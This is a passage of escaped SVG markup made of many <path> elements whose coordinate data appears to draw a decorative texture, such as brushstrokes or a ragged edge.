d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,